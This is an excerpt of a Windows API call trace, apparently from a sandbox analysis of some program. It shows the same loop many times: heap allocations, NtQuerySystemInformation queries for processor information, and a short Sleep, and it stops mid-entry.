[0204.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.926] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.927] Sleep (dwMilliseconds=0x110) [0204.947] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.947] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.947] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.947] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.947] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.948] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.948] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.948] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.949] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.949] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.949] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.950] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.950] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.951] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.951] Sleep (dwMilliseconds=0x110) [0204.966] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.966] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.967] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.967] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.967] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.968] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.968] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.969] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.969] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.969] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.970] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.970] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.971] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.971] Sleep (dwMilliseconds=0x110) [0204.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.982] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.982] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.982] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.983] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.983] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.983] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.984] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.984] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.984] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0204.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.985] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0204.985] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.985] Sleep (dwMilliseconds=0x110) [0204.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0204.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.998] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.998] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0204.998] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0204.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0204.999] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0204.999] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0204.999] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.000] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.000] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.001] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.001] Sleep (dwMilliseconds=0x110) [0205.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.013] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.013] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.013] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.014] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.014] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.014] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.015] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.015] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.015] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.016] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.016] Sleep (dwMilliseconds=0x110) [0205.028] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.028] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.029] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.031] Sleep (dwMilliseconds=0x110) [0205.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.082] Sleep (dwMilliseconds=0x110) [0205.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.091] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.095] Sleep (dwMilliseconds=0x110) [0205.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.109] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.110] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.111] Sleep (dwMilliseconds=0x110) [0205.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.124] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.126] Sleep (dwMilliseconds=0x110) [0205.139] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.139] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.143] Sleep (dwMilliseconds=0x110) [0205.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.160] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.160] Sleep (dwMilliseconds=0x110) [0205.170] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.170] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0205.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0205.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0205.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0205.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0205.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0205.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0205.174] Sleep (dwMilliseconds=0x110) [0205.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0205.188] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, 